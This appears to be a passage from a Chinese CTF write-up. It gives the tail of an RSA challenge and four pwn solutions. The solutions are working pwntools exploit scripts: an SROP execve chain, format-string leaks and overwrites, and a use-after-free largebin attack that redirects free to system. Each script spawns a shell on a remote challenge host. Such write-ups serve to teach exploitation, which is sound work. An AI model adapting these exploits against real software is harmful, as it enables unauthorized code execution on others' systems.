qqq=121042531930820997492656296084544616958724191434895945419858099204426898 7114135268063008545539937388030314974384954032914064819978772739168839182533

0290919653382394532727731267293181955534413977799280110643764379049837946953

0787985051569590331291422592393540391481519004782904598710037907420679190942

964514816

assert len(FLAG) == 42 n1 = P * Q1

n2 = P * Q2

c1 = pow(bytes_to_long(FLAG), E1, n1) c2 = pow(bytes_to_long(FLAG), E2, n2) print(f’n1 = {n1}’)

print(f’n2 = {n2}’)

print(f’c1 = {c1}’)

print(f’c2 = {c2}’) #

n1=2165561783835803789553460516235878432649525146244721848510215599715639413 2443891540203860915433559917314267455046844360743623050975083617915806922096

6973046038781342959646504303933752257927818047262924609237088907228274365522

0901636804742099361349719605932637461621765562581017108054526705826627811264

7715784756433895809757917070401895613168910166812566545593405362953487807840

5394253831233698427418212605230052084793614848917627147497216838347546015967

9670766971808434384527679315364900562859089627928195658860706299939888931424

0295073524688108299345609307659091936270255367762936542565961639163236594456

862919813549 #

n2=2462301633869857996743178168020007570624101438406625066036094968438583160 4822817314457973559632215801205780786144608311361063622813017396858888436529

1167377546530672038433060157670915856978033646566249268535519972298970877312

9879790420829258556251760213266333174878439075295875766148456033540676920449

1939879324079089140420467301773366050084810282369044622442784113688062220370

5315220365128034616070496196413365244865073882322806837260656792957424561586

0621329453395658046286348808202856336000696691226490842468068657734454903403

3470952036766850596897062924137344079889301948258438680545785139118107899367

307031396309 #

c1=2615722342860373905833491925692465899705229373785773622118746270300793647 0988219935506865814188825182040942998120337190200775092702900076158665722021

9273116953884351363410697782718768870972519864348137556211429403263721189227

6591506759075653224150064709644522873824736707734614347484224826380423111005

2748012913291324312699495756309189925209490958376804363171286769273896927909

5719567431021974091858543779301621870220719292533082116512664726085964487658

3452851011163136097317885847756944279214149072452930036614703451352331567857

4537700206264149480053585470896074805082740058886485697177505230943429737671

48059329557 #

c2=6769301750070285366235237940904276375318319174100507184855293529277737253 6727928512121852367358197182828169276031676701541157300236446815636020207328

0100203552427689449700991059546845936999776555268240428155796838341345846618

1053253824257764740656801662020120125474240770889092605770532420770257017137

7477445652021441836429727149278948093736579771428845082301079406189698178852

1445455866700838362876950847296303955106743257948889985353741063417522058348

9733111861415444811663313479382343954977022383996370428051605169520337142916

0793006743560828559784567988126615357400082779137698091121143646172143981544

57094899399

执⾏后得到flag

FLAG: flag{27dab675-9e9b-4c1f-99ab-dd9fe49c190a}

PWN

pwn1

from pwn import * from ctypes import *

from LibcSearcher import *

context(os=’linux’, arch=’amd64′, log_level=’debug’) target = remote(‘101.200.58.4’, 10001)

binary = ELF(‘./pwn’) gdb.attach(target, ‘b *0x401000’) pause()

frame = SigreturnFrame() frame.rax = 59

frame.rdi = 0x40200A frame.rsi = 0

frame.rdx = 0 frame.rip = 0x40102D

payload = b”

payload += p64(0x40103D) payload += p64(0x401034) payload += p64(0x401030) payload += p64(0x401034) payload += p64(0x401030) payload += p64(0x401034) payload += p64(0x401030) payload += p64(0x401034) payload += p64(0x40102D) payload += bytes(frame)

target.sendline(payload) target.interactive()

FLAG: flag{f74ef366-9507-486b-b73d-1ff0b6eee995}

pwn2

from pwn import * from ctypes import *

from LibcSearcher import *

def send_data(a): p.send(a)

def send_after_prompt(a, b): p.sendafter(a, b)

def send_line(a):

p.sendline(a)

def send_line_after_prompt(a, b): p.sendlineafter(a, b)

def receive(): p.recv()

def print_receive(): print(p.recv())

def receive_until(a): return p.recvuntil(a)

def interactive_shell(): p.interactive()

def attach_gdb(): gdb.attach(p)

def get_memory_address():

return u64(p.recvuntil(b’\x7f’)[-6:].ljust(8, b’\x00′))

def get_system_bin_sh():

return libc_base + libc.sym[‘system’], libc_base + next(libc.search(b’/bin/sh\x00′))

context(os=’linux’, arch=’amd64′, log_level=’debug’) libc = ELF(‘./libc.so.6’)

binary = ELF(‘ret’)

while True:

p = process(‘ret’) p.recvuntil(b’ask’)

pop_rdi = 0x0000000000400923 attach_gdb()

pause() p.send(b’%3$p’) p.recvuntil(b’0x’)

libc_base = int(p.recv(12), 16) – 0x110031 libc.address = libc_base

print(“libc_base” + hex(libc_base))

bin_sh = next(libc.search(b’/bin/sh\x00′)) system = libc.sym[‘system’]

one_gadget = [0x4f29e, 0x4f2a5, 0x4f302, 0x10a2fc][1] + libc_base payload = b’a’ * 0x88 + p64(one_gadget)

p.recvuntil(b’ok,’)

num = int(p.recvuntil(b’ ‘)) if num < 144:

continue p.recvuntil(b’number’) p.sendline(payload)

interactive_shell()

FLAG: flag{32ea4bd3-0c5d-48b1-886f-3c73196bad5e}

pwn3

arm架构的fmt题型，找到show函数存在fmt漏洞，写出如下的脚本

from pwn import *

context.arch = ‘aarch64’

p = remote(‘101.200.58.4’, 5555)

p.recvuntil(‘rr ‘)

stderr = int(p.recvline(), 16) print(‘stderr:’, hex(stderr))

def add_entry(idx, size): p.sendlineafter(‘e: ‘, str(ord(‘a’))) p.sendlineafter(‘x: ‘, str(idx)) p.sendlineafter(‘ze: ‘, str(size))

def edit_entry(idx, data): p.sendlineafter(‘e: ‘, str(ord(‘e’))) p.sendlineafter(‘x: ‘, str(idx)) p.sendafter(‘t: ‘, data)

def show_entry(idx):

p.sendlineafter(‘e: ‘, str(ord(‘s’))) p.sendlineafter(‘x: ‘, str(idx))

def generate_fmt_string_pre(addr): if addr == 0:

return ‘%29$hn’

payload = ‘%’ + str(addr) + ‘c’ + ‘%29$hn’ return payload

def generate_fmt_string(addr): if addr == 0:

return ‘%65$hn’

payload = ‘%’ + str(addr) + ‘c’ + ‘%65$hn’ return payload

def change_address(addr):

edit_entry(0, generate_fmt_string(addr & 0xffff)) show_entry(0)

def exploit(): add_entry(0, 0x100)

edit_entry(0, ‘%8$p.%9$p.’) show_entry(0) p.recvuntil(‘t: ‘)

stack = int(p.recvuntil(‘.’)[:-1], 16) – 0x18

base_addr = int(p.recvuntil(‘.’)[:-1], 16) – 0xea0 print(‘stack:’, hex(stack))

print(‘base_addr:’, hex(base_addr))

edit_entry(0, generate_fmt_string_pre(stack & 0xffff)) show_entry(0)

change_address(base_addr + 0xd40) p.interactive()

exploit()

执⾏后得到flag

FLAG: flag{06c62ef8-66f9-48f7-9f7d-1d0a17411d1a}

pwn4

⼀道uaf漏洞的题⽬

有⼀个限制⼤⼩的malloc申请

使⽤largbin attack打mp_，然后释放进tcache，最后将freegot改成system

编写如下的脚本

from pwn import *

FILENAME = ‘../pwn17′ elf = ELF(FILENAME)

libc = elf.libc

p = remote(“101.200.58.4”, 2222)

def send_option(option): p.recvuntil(b’>’)

p.sendline(bytes(str(option), ‘utf-8′))

def create_entry(idx, size): send_option(1) p.recvuntil(b’Index’)

p.sendline(bytes(str(idx), ‘utf-8′)) p.recvuntil(b’Size’) p.sendline(bytes(str(size), ‘utf-8′))

def free_entry(id): send_option(2) p.recvuntil(b’Index’)

p.sendline(bytes(str(id), ‘utf-8′))

def edit_entry(id, content): send_option(3) p.recvuntil(b’Index’) p.sendline(bytes(str(id), ‘utf-8′)) p.recvuntil(b’Content’) p.send(content)

def show_entry(id): send_option(4) p.recvuntil(b’Index’)

p.sendline(bytes(str(id), ‘utf-8′))

create_entry(0, 0x510) create_entry(1, 0x510)

create_entry(2, 0x500)

free_entry(0) show_entry(0)

libc_addr = u64(p.recv(6).ljust(8, b’\x00′)) libc_base = libc_addr – 0x1f6cc0

create_entry(3, 0x530) free_entry(2)

fd = 0x1f70f0 + libc_base

mp = libc_base + 0x1f63a0 + 0x8

edit_entry(0, p64(fd) + p64(0) * 2 + p64(mp – 0x20)) create_entry(4, 0x530)

free_entry(4) target = 0x4040e0

edit_entry(0, b’\x00’ * 0x80 + p64(target)) create_entry(5, 0x530)

edit_entry(5, p64(0x404000))

system_addr = libc_base + libc.symbols[‘system’] edit_entry(0, p64(system_addr))

edit_entry(4, b’/bin/sh\x00′) free_entry(4)

p.interactive()

执⾏后得到flag

FLAG: flag{f4de9bdb-2ffb-4172-9fdc-5497194e7e6e}